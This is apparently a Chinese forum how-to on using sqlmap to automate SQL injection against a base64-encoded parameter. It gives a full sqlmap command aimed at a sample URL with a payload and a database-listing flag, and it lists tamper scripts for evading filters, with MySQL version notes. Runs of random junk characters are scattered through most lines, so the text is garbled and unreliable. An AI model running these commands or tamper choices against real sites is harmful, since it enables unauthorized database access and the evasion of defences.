WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
9 v; }, \* o/ g* d1 r! e. _& I, X) x
sqlmap的tamper里有个base64encode.py
; r6 W1 T; P' K( J0 ]6 o" y' ~8 e1 i+ ~" d
使用如下+ o8 b$ v- E0 M2 P' y
; ^" J% l2 v5 ~+ J0 @sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs `' c/ s* r- J6 ^) K
" B7 T2 T$ D# G+ Q- v1 |* ], k, @% o; m& K; e7 I
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”- C. g' s( @9 ~. g& |
3 x6 b( H, T# f. ^0 b- w& G, V其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
. f1 p3 m" ^/ P. z+ l& z& i% s
, U7 J. y7 B$ ^' g& f+ j" \9 X vspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
7 N' z7 P* o- j; Pspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入6 f- B( d+ g3 J# e k7 k
首先确定目标数据库版本,然后选择相应的脚本。) m+ T% ^/ }- t$ k+ i9 s) Y
-v 3 --batch --tamper "space2hash.py"
& O% K" l: |# C1 v( W
7 M+ i: i/ L; W" f/ j3 c" a还有其他一些插件:
. P* j4 ]( I9 e# F5 mencodes编码 ——charencode.py
( [, m5 F6 |9 @4 Z* rbase64编码 —— base64encode.py
/ \4 H9 p! _4 o! P替换空格和关键字 —— halfversionedmorekeywords.py8 F, H3 Y5 A. Z2 h6 w
|
) p6 K; I: H2 b% u; z/ G( N' t0 t, a$ k+ d1 o
, W+ N& Z' K7 n* [! c$ L
8 v' H5 }7 c' ^5 c |